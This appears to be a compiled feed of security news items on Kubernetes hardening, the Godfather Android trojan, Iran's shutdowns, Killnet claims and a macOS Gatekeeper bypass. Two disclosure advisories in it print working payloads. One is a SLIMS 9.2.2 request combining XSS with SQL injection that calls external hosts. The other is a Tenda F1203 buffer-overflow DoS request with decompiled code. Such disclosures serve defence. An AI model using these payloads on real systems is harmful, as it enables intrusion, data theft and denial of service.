The open source container tool is quite popular among developers — and threat actors. Here are a few ways DevOps teams can take control.

_Editor's note: For more about the kinds of vulnerabilities Kubernetes presents and how to address them, read our_ _companion article_ _in The Edge._

Since its initial release in 2014, Kubernetes (aka K8s) has become the standard open source container tool for managing software applications. Kubernetes is cost-effective, offers autoscaling, and can run on any infrastructure. Its benefits are why 85% of IT leaders consider Kubernetes "extremely important" to cloud-native strategies. On top of this, 61% of people use Kubernetes to manage their computer application deployment.

Funso Richard, information security officer at Ensemble, tells Dark Reading that "forward-thinking organizations understand the importance of leveraging containerized microservices to develop scalable and reliable applications as an essential digital transformation strategy" — and Kubernetes has become the leading tool used to achieve this strategy, he adds.

However, Kubernetes also comes with security challenges: It's susceptible to data theft, computational power theft, and denial-of-service (DoS) attacks. Kubernetes' public components (such as kubelets and API authentication) are widely exploited. And threat actors target infrastructure misconfiguration, unpatched software programs, and poor login credentials to gain unauthorized entry to Kubernetes. The vulnerabilities are also widespread. According to Red Hat's "2022 State of Kubernetes" security report, 93% of Kubernetes users experienced at least one security incident in the past 12 months.

As DevOps teams continue to grapple with rising Kubernetes security mishaps, here are a few ways to stay ahead of attackers and keep cloud-native environments secure.

**Securing Kubernetes With Tools**

Kubernetes' security vulnerability affects its efficiency. For instance, concerns over Kubernetes security caused developers to delay application rollouts in 2022, according to Red Hat. Although Kubernetes provides several benefits in application development and container orchestration, says Richard, inadequate security controls expose the open source tool to serious security concerns like misconfiguration, privilege abuse, data exfiltration, credential compromise, exploited public-facing components, and API vulnerabilities. To address these, several Kubernetes security tools have sprung up, including Kubescape, Kube-bench, Kubeaudit, Kube-hunter, and Kyverno.

Kubescape is an open source security platform from ARMO to protect Kubernetes clusters with capabilities such as risk analysis, security compliance, misconfiguration scanning, CI/CD security, RBAC visualizer, and vulnerabilities scanning. One thing that sets Kubescape apart is its library of robust capabilities that aligns with MITRE ATT&CK and NSA-CISA frameworks, says Richard.

"As I track Kubernetes security offerings — both commercial and non-commercial offerings — I haven't come across another offering with the same exact components as Kubescape," agrees Fernando Montenegro, senior principal analyst of cybersecurity infrastructure at Omdia.

Kubescape scans clusters, YAML files, and Helm charts for vulnerabilities either directly or via CI/CD integrations. The idea of scanning infrastructure-as-code (IaC) templates is well-popularized across the industry, says Montenegro. Most IaC scanning is done for cloud resources like Amazon's CloudFormation, HashiCorp's Terraform, and others, with Kubernetes scanning being a more specialized use case, he adds.

There are other offerings in the market — like Red Hat's StackRox (acquired in 2021), Tenable's Terrascan, and Palo Alto Networks' Checkov — offering similar capabilities as Kubernetes.

**Implementing Best Security Practices in Kubernetes**

Richard notes that adherence to cybersecurity fundamentals remains the bedrock of any security effort. While Kubescape is undoubtedly a powerful Kubernetes security tool, he believes developers can effectively secure their Kubernetes clusters by following the basics: implementing proper cluster configuration, pod security standards and policy enforcement, network segmentation, vulnerability scanning, periodic policy reviews, and security audits. "Containers should run with the least privileges and only necessary services, while role-based access controls should be in place to manage user access," Richard says.

While Montenegro says there are several Kubernetes best practices for DevOps and DevSecOps teams to follow, he notes that the following practices must be top on their priority list:

*   **Think about security early on:** Collaborate with your developers/architects to work through a proper threat modeling.
*   **Work with embedding security throughout the application lifecycle:** Security is an end-to-end process, from providing on-the-spot security advice and functionality for a developer working through the code in their development environment, through making sure security tests are part and parcel of the integration stages, then adding the necessary runtime protections to monitor workloads in production.
*   **Safely store Kubernetes secrets:** Implement features like proper namespace separation, use of role-based access control (RBAC).

As Kubernetes grows in adoption, IT teams can avoid security pitfalls by using tools like Kubescape and StackRox, as well as following the best security practices for securing their critical Kubernetes assets.

How to Run Kubernetes More Securely

The malware has resurfaced, using an icon and name similar to the legitimate Google Play app MYT Music, a popular app with more than 10 million downloads.

A type of Android malware that's been targeting banking users worldwide since March has resurfaced with advanced obfuscation methods, masquerading as a legitimate application on the Google Play store with more than 10 million downloads, researchers have found.

Godfather is a banking Trojan that is best known for targeting banking users in European countries, but its latest activity shows an increased sophistication in its ability to fly under the radar of common malware-detection methods, researchers from Cyble Research & Intelligence Labs (CRIL) said in a blog post on Dec. 20.

Once it's successfully installed on a victim's device, Godfather initiates a series of typical banking Trojan behaviors, including stealing banking and crypto-exchange credentials, the researchers said. But it also steals sensitive data such as SMSs, basic device details — including data from installed applications — and the device's phone number, and it can perform a number of nefarious actions silently in the background.

"Apart from these, it can also control the device screen using VNC \[virtual network computing\], forwarding incoming calls of the victim's device and injecting banking URLs," the Cyble researchers wrote.

The latest sample of Godfather that researchers discovered was encrypted using custom encryption techniques that could evade detection by common antivirus products — a new tactic of the threat actors behind the malware, the researchers said.

**Targeting Businesses & Consumers**

Upon further examination, the researchers found that the malware was using an icon and name similar to the legitimate Google Play app MYT Music, which already has logged more than 10 million downloads. Indeed, threat actors often hide malware on Google Play, despite Google's best efforts in the last several years to keep bad apps off its store before users are affected by it.

MYT Music was written in the Turkish language and thus researchers assume the Godfather sample they discovered is targeting Android users in Turkey. However, they suspect other versions of the malware continue to be active and targeting banking users worldwide.

Though banking Trojans tend to affect consumers more than the enterprise, business users are still at risk because they use their mobile devices at work and may even have business apps and data stored on their devices. For this reason, enterprise users should be especially wary of downloading apps from the Internet or opening any links received via SMS or emails delivered to a mobile phone, the researchers said.

Google Play has removed the app, but those with it installed are still at risk.

**How Godfather Pulls Victims' Strings**

Once it's installed on an Android device, Godfather requests 23 different permissions from the device, abusing a number of them to gain access to a user's contacts and the state of the device, as well as information related to the user account. It also can write or delete files in external storage and disable the keylock and any associated password security, the Cyble researchers said.

Godfather can successfully do money transfers from a hacked device through its ability to initiate phone calls through Unstructured Supplementary Service Data (USSD) that don't require use of the dialer user interface, and thus don't need the user to confirm the call, they said.

The malware also extracts sensitive user data from the device — including application key logs — that can be sent back to a command-and-control (C2) server, which also sends Godfather a command that forwards any incoming calls the victim receives to a number provided by the threat actor, the researchers said.

Godfather then harvests credentials: It creates an overlay window in the OnAccessibilityEvent method and injects HTML phishing pages via a separate command from C2, the server URL of which is from a Telegram channel, hxxps://t\[.\]me/varezotukomirza, the researchers said.

Once it completes its malicious activity, Godfather receives a "killbot" command from C2 to self-terminate, they added.

**Avoiding Being Whacked by Godfather**

The most common way to avoid downloading mobile app malware is to download and install software only from official app stores such as Google Play or Apple, the conventional wisdom goes.

However, as this instance proves, malware can lurk in official app stores too, so "practicing basic cyber-hygiene across mobile devices and online banking applications effectively prevents such malware from compromising your devices," the researchers noted in the post, including using a reputable antivirus and Internet security software package on connected devices to ensure anything downloaded is free from malware.

Also, advanced anti-detection methods like the ones the threat actors behind Godfather are using can make even downloading what look like legitimate apps tricky, they said. To further protect themselves, users can utilize strong passwords and enforce multifactor authentication on devices wherever possible, making it more difficult for threat actors to crack into their accounts. 

Android device users also should ensure that Google Play Protect is enabled on their devices for further security protection, the Cyble researchers added.

All mobile device users also should enable biometric security features such as fingerprint or facial recognition for unlocking the mobile device and using apps, where possible, and be especially careful when enabling permissions on devices, especially if an app has not been verified by a reputable provider, they added.

Godfather Banking Trojan Masquerades as Legitimate Google Play App

A new US State Department assessment highlights the stark economic toll of Tehran’s recent shutdowns and platform control.

As internet shutdowns, platform blocking, and content filtering become increasingly common levers for authoritarian control around the world, Iran has presented an especially dramatic case study on the economic impact and humanitarian toll of connectivity blackouts. 

In response to mass government opposition and protests, the Iranian regime launched an extensive shutdown in September that drastically limited all digital communication in the country. And Tehran has ongoing campaigns to slow connectivity and access to popular services, including Meta's Instagram. Dragging out the disruptions, though, is beginning to reveal the true economic toll of the brutal technique, according to new assessments by the US Department of State.

Iran is already a heavily sanctioned and isolated nation, yet the government has repeatedly imposed broad digital restrictions and shutdowns, including notable initiatives in 2017 and 2019. The cumulative impact of these crackdowns has affected the rights of more than 80 million people living in Iran and disrupted every aspect of Iranian society, including commerce.

“This is another instance, an important one, in which the officials show how they consistently pick their own self-interest over the public interest,” says Reza Ghazinouri, a strategic adviser for the San Francisco–based human rights and civil liberties group United for Iran. “In the past years, millions of Iranians have fallen below the poverty line, and further limiting access to platforms like Instagram just adds many more to that number. And this disproportionately impacts women. Sixty-four percent of Iranian businesses on Instagram are women-owned.”

From communicating with customers to processing transactions, businesses rely on digital platforms in different ways, but digital disruptions have an impact on businesses of all sizes. Multiple Iranian trade associations have said in recent weeks that their member companies are reporting major losses. And some reports have found that the recent outage affected hundreds of thousands of small businesses. 

“This censorship underscores the degree to which Iran’s leadership fears what is possible when its people can freely communicate with one another and the outside world,” Rob Malley, US special envoy for Iran, told WIRED in written remarks.

The protest movement in Iran has gained momentum since 22-year-old Mahsa Amini died in the custody of Iran's “morality police” while being held for allegedly breaking rules about wearing hijab. Since September, more than 18,000 people have been detained by Iranian law enforcement related to the demonstrations, and nearly 500 people, including nearly 60 children, have been killed at the protests as officials exert increasingly draconian force on demonstrators. 

Analysis of the recent shutdown by a consortium of digital rights groups, published at the end of November and cited by the State Department, showed that the Iranian government has been deploying an increasingly broad set of technical capabilities to make it more difficult for the population to circumvent digital restrictions. For example, the government has broadened its ability to block encrypted connections to defeat users' efforts to conceal their web browsing. Officials have also continued to expand their blocks on the Google Play Store, Apple's App Store, and browser extension stores, making it harder for Iranians to download circumvention tools. The findings also indicate that there is a cumulative impact and increasing effectiveness over time as the government stacks censorship, content filtering, and blocking with intermittent and large-scale outages.

It is difficult to gauge the exact economic impact of the digital blackouts and disentangle it from other factors like international sanctions. Based on the escalating internet shutdown tactics and tolerance for self-inflicted damage, though, the State Department believes that the Iranian regime feels more threatened by the recent protest movement than previous public waves of opposition. 

Earlier this month, in a high-profile concession to protesters, the Iranian government said it had shut down the “morality police” that enforced restrictive laws, particularly a rigid Islamic dress code for women. The laws are still in place, though, and it is unclear how much the move will actually impact enforcement in practice.

A State Department spokesperson told WIRED in a statement that the White House is “committed to helping the Iranian people exercise their universal right to freedom of expression and to freely access information via the internet.”

Iran’s Internet Blackouts Are Sabotaging Its Own Economy

By Habiba Rashid
On Telegram, Killnet hackers have leaked a text file showing the login credentials of 10,000 individuals whom they claim are FBI agents.
This is a post from HackRead.com Read the original post: Russian Killnet Hackers Claim Data Theft of FBI Agents

The hacker group also claimed to have breached the security of the US Federal Motor Carrier Safety Administration (FMCSA).

The Russian hacker group, KillNet, claims to have infiltrated the FBI’s database, allegedly stealing the personal information of more than 10,000 US federal agents. Like most of their attacks, this alleged attack also appears to have political undertones motivating the pro-Kremlin group. 

It is worth mentioning that, just last week, the FBI’s security platform **InfraGard suffered a data breach** in which the personal data of its 87,000 members was stolen and leaked online.

Although Killnet’s attack remains unverified, KillNet hackers claim that the stolen data includes social media passwords and bank details. The group posted screenshots on Telegram that showed passwords to online stores, medical ID cards, and Google, Apple, and Instagram accounts.

Alleged FBI agents’ data (1) Killnet hackers on Telegram (2) Image credit: Hackread.com

“All passwords from online stores to the mass acceptance card, Google, and Apple accounts are at our disposal,” read a statement attributed to the hackers on Russian Telegram channels.

As seen by Hackread.com, another screen recording showed the hackers using the Facebook account allegedly belonging to an employee of the Federal Motor Carrier Safety Administration (FMCSA). They show being in control of the account by posting “We are KillNet” on the person’s profile page.

Image credit: Hackread.com

KillNet hackers have been behind a number of operations targeting Western government institutions and private companies supporting Ukraine since the Russian invasion in February.

Last month, the group first hit **Prince William’s website** with DDoS attacks, and just days after that, the **European Parliament website** was targeted.

**In August**, Killnet claimed to have hacked Lockheed Martin and stolen employee data. **In June**, Lithuanian government websites were also hit by crippling DDoS attacks by the same group.

Nevertheless, since the Russo-Ukraine war began in February, Killnet has launched seventy-six attacks against countries supporting Ukraine.

1.  **Anonymous Declares War Against Pro-Russia Hacker Group Killnet**
2.  **DDoS App Meant to Hit Russia, Infected Phones of Ukrainian Activists**
3.  **Russia Hackers Abuse BRc4 Red Team Pentest Tool in Recent Attacks**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Russian Killnet Hackers Claim Data Theft of FBI Agents

Senayan Library Management System version 9.2.2 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.2.2 a.k.a SLIMS 9 XSS-Reflected - inserting gif - redirect to outside HTTPS server## Author: nu11secur1ty## Date: 12.21.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.2## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload t8xqv<script>alert(1)</script>uou2q was submitted in themanual insertion `point 3`.This input was echoed unmodified in the application's response.The attacker can trick the already authenticated users to visit a verydangerous web page or malicious javascript exploit.## STATUS: HIGH Vulnerability[+] Payloads:```GETGET /slims9_bulian-9.2.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27%27%2b(select%20load_file(%27%5c%5c%5c%5cazditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id%5c%5cdzd%27))%2b%27HTTP/1.1Host: pwnedhost.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=ijs22qmki227r86feh6bppc56o; admin_logged_in=1Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2)## Proof and Exploit:[href](https://streamable.com/mnpw30)## Time spent`00:05:00`

Senayan Library Management System 9.2.2 Cross Site Scripting

The latest bypass for Apple's application-safety feature could allow malicious takeover of Macs.

A bypass vulnerability in macOS for Apple's Gatekeeper mechanism could allow cyberattackers to execute malicious applications on target Macs — regardless of whether Lockdown mode is enabled.

Among the details on the bug (CVE-2022-42821), which Microsoft dubbed "Achilles," is the fact that researchers were able to craft a working exploit using the Access Control Lists (ACL) mechanism in macOS, which allows fine-tuned permissioning for applications.

**Popular Target: Apple Gatekeeper for Vetting Applications**

Apple Gatekeeper is a security mechanism designed to ensure that only "trusted apps" run on Mac devices — i.e., those that are signed by a valid authority and approved by Apple. If the software can't be validated by Gatekeeper, the user gets a blocking pop-up explaining that the app can't be executed.

In theory, this mitigates the threat of malicious sideloaded applications that users might accidentally download from pirate sites or third-party app stores. The issue, though, is that bad actors have devoted quite a bit of time to finding bypass avenues for the feature, Microsoft researchers noted, as shown by previous exploited vulnerabilities such as CVE-2022-22616, CVE-2022-32910, CVE-2021-1810, CVE-2021-30657, CVE-2021-30853, CVE-2019-8656, and CVE-2014-8826.

And no wonder: "Gatekeeper bypasses such as this could be leveraged as a vector for initial access by malware and other threats and could help increase the success rate of malicious campaigns and attacks on macOS," Microsoft researchers warned in an advisory issued this week. "Our data shows that fake apps remain one of the top entry vectors on macOS, indicating Gatekeeper bypass techniques are an attractive and even a necessary capability for adversaries to leverage in attacks."

**Uncovering a New Gatekeeper Bypass**

Piggybacking off of details surrounding CVE-2021-1810, Microsoft researchers looked to create a new bypass — which they managed to do by appending malicious files with special permissioning rules via the ACL mechanism.

Apple employs a quarantine mechanism for downloaded apps, according to the advisory: "When downloading apps from a browser, like Safari, the browser assigns a special extended attribute to the downloaded file. That attribute is named com.apple.quarantine and is later used to enforce policies such as Gatekeeper."

However, there is an additional option in macOS to apply a special extended attribute named com.apple.acl.text, which is used to set arbitrary ACLs.

"Each ACL has one or more Access Control Entries (ACEs) that dictate what each principal can or cannot do, much like firewall rules," Microsoft researchers explained. "Equipped with this information, we decided to add very restrictive ACLs to the downloaded files. Those ACLs prohibit Safari (or any other program) from setting new extended attributes, including the com.apple.quarantine attribute."

And without the quarantine attribute in place, Gatekeeper is not alerted to check the file, which allows it to bypass the security mechanism altogether.

Crucially, Microsoft researchers found that Apple's Lockdown feature, which it debuted in July to prevent state-sponsored spyware from infecting at-risk targets, can't thwart the Achilles attack.

"We note that Apple’s Lockdown Mode, introduced in macOS Ventura as an optional protection feature for high-risk users that might be personally targeted by a sophisticated cyberattack, is aimed to stop zero-click remote code execution exploits, and therefore does not defend against Achilles," according to Microsoft.

The issue was disclosed to Apple in July, with fixes rolling out in the latest macOS version. To protect themselves, Mac users are encouraged to update their operating systems to the latest version as soon as possible.

Microsoft Warns on 'Achilles' macOS Gatekeeper Bypass

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the urls parameter at /goform/saveParentControlInfo.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/saveParentControlInfo request.

This vulnerability lies in the /goform/saveParentControlInfo page，The details are shown below:

    int __fastcall saveParentControlInfo(int a1)
    {
      int v2; // $v0
      int v3; // $v0
      void *dest; // [sp+30h] [+30h] BYREF
      void *ptr; // [sp+34h] [+34h]
      int v6; // [sp+38h] [+38h]
      int v7; // [sp+3Ch] [+3Ch]
      int i; // [sp+40h] [+40h]
      int v9; // [sp+44h] [+44h]
      int v10; // [sp+48h] [+48h]
      char *nptr; // [sp+4Ch] [+4Ch]
      char *v12; // [sp+50h] [+50h]
      char *v13; // [sp+54h] [+54h]
      char *urls_value; // [sp+58h] [+58h]
      char *v15; // [sp+5Ch] [+5Ch]
      char *time_value; // [sp+60h] [+60h]
      char *v17; // [sp+68h] [+68h]
      char *deviceId_value; // [sp+6Ch] [+6Ch]
      char v19[64]; // [sp+70h] [+70h] BYREF
      char v20[512]; // [sp+B0h] [+B0h] BYREF
      int v21; // [sp+2B0h] [+2B0h] BYREF
      __int16 v22; // [sp+2B4h] [+2B4h] BYREF
      unsigned __int8 v23; // [sp+2B6h] [+2B6h] BYREF
      char v24[120]; // [sp+2B8h] [+2B8h] BYREF
      char v25[128]; // [sp+330h] [+330h] BYREF
      int v26; // [sp+3B0h] [+3B0h] BYREF
      int v27[5]; // [sp+3B4h] [+3B4h] BYREF
      int v28[8]; // [sp+3C8h] [+3C8h] BYREF
      int v29[8]; // [sp+3E8h] [+3E8h] BYREF
    
      memset(v19, 0, sizeof(v19));
      memset(v20, 0, sizeof(v20));
      v21 = 0;
      v22 = 0;
      v23 = 0;
      deviceId_value = (char *)websGetVar(a1, "deviceId", &unk_4CE8D8);
      v17 = (char *)websGetVar(a1, "enable", &unk_4CE8D8);
      time_value = (char *)websGetVar(a1, "time", &unk_4CE8D8);
      v15 = (char *)websGetVar(a1, "url_enable", &unk_4CE8D8);
      urls_value = (char *)websGetVar(a1, "urls", &unk_4CE8D8);
      v13 = (char *)websGetVar(a1, "day", &unk_4CE8D8);
      v12 = (char *)websGetVar(a1, "block", &unk_4CE8D8);
      nptr = (char *)websGetVar(a1, "connectType", &unk_4CE8D8);
      if ( atoi(nptr) == 1 && atoi(v12) == 1 )
        wl_l2_filter_add(deviceId_value);
      if ( *time_value )
      {
        v28[0] = 0;
        v28[1] = 0;
        v28[2] = 0;
        v28[3] = 0;
        v28[4] = 0;
        v28[5] = 0;
        v28[6] = 0;
        v28[7] = 0;
        v29[0] = 0;
        v29[1] = 0;
        v29[2] = 0;
        v29[3] = 0;
        v29[4] = 0;
        v29[5] = 0;
        v29[6] = 0;
        v29[7] = 0;
        sscanf(time_value, "%[^-]-%s", v28, v29);
        if ( !strcmp((const char *)v28, (const char *)v29) )
        {
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 1);
          return websDone(a1, 200);
        }
      }
      v10 = 0;
      v9 = 0;
      i = 0;
      memset(v24, 0, sizeof(v24));
      memset(v25, 0, sizeof(v25));
      v7 = 0;
      v26 = 0;
      v6 = 0;
      ptr = malloc(0x254u);
      memset(ptr, 0, 0x254u);
      strcpy((char *)ptr + 2, deviceId_value);
      dest = malloc(0x254u);
      memset(dest, 0, 0x254u);
      *(_WORD *)dest = atoi(v17) != 0;
      strcpy((char *)dest + 2, deviceId_value);
      strcpy((char *)dest + 34, time_value);
      sscanf(
        v13,
        "%d,%d,%d,%d,%d,%d,%d",
        &v21,
        (char *)&v21 + 1,
        (char *)&v21 + 2,
        (char *)&v21 + 3,
        &v22,
        (char *)&v22 + 1,
        &v23);
      if ( !(_BYTE)v21
        && __PAIR16__(BYTE1(v21), 0) == BYTE2(v21)
        && __PAIR16__(HIBYTE(v21), 0) == (unsigned __int8)v22
        && __PAIR16__(HIBYTE(v22), 0) == v23
        && !*v12 )
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = 1;
      }
      else
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = *((_BYTE *)&v21 + i) != 0;
      }
      v2 = atoi(time_value);
      *((_DWORD *)dest + 19) = v2;
      strcpy((char *)dest + 80, urls_value);
      v3 = atoi(v15);
      *((_BYTE *)dest + 592) = v3 != 0;
      v10 = getparentcontrolinfo(0, &v26, ptr);
      if ( v10 <= 0 )
      {
        if ( !atoi(v17) && atoi(v12) != 1 )
        {
    LABEL_28:
          free(ptr);
          free(dest);
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 0);
          return websDone(a1, 200);
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
            for ( i = 0; i < 7; ++i )
              *((_BYTE *)dest + i + 66) = 1;
            strcpy((char *)dest + 34, "00:00-24:00");
          }
        }
        v9 = bm_get_id_list("parent.control.id", v24, 30);
        if ( v9 )
        {
          if ( v9 >= 30 )
          {
            free(ptr);
            free(dest);
            websWrite(
              a1,
              "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
            websWrite(a1, "{\"errCode\":%d}", 1);
            return websDone(a1, 200);
          }
          for ( i = 0; i != 30; ++i )
          {
            if ( !*(&dest + i + 162) )
            {
              v26 = i + 1;
              break;
            }
          }
          GetValue("parent.control.id", v20);
          sprintf(v25, "%s,%d", v20, v26);
          SetValue("parent.control.id", v25);
          setparentcontrolinfo(v10, v26, dest);
        }
        else
        {
          SetValue("parent.control.id", "1");
          v26 = 1;
          setparentcontrolinfo(v10, 1, dest);
        }
      }
      else
      {
        if ( atoi(v17) )
        {
          *((_DWORD *)dest + 19) = *((_DWORD *)ptr + 19);
        }
        else
        {
          memcpy(dest, ptr, 0x254u);
          *(_BYTE *)dest = 0;
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          memcpy(dest, ptr, 0x254u);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
          }
          else
          {
            *((_BYTE *)dest + 1) = 0;
          }
        }
        if ( !memcmp(ptr, dest, 0x254u) )
          goto LABEL_28;
        setparentcontrolinfo(v10, v26, dest);
      }
      free(ptr);
      free(dest);
      v27[0] = 0;
      v27[1] = 0;
      v27[2] = 0;
      v27[3] = 0;
      v27[4] = 0;
      sprintf((char *)v27, "op=%d", 5);
      send_msg_to_netctrl(14, v27);
      send_msg_to_netctrl(41, v27);
      CommitCfm();
      websWrite(
        a1,
        "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
      websWrite(a1, "{\"errCode\":%d}", 0);
      return websDone(a1, 200);
    }
    

This POC can result in a Dos.

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 4106
    
    urls=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa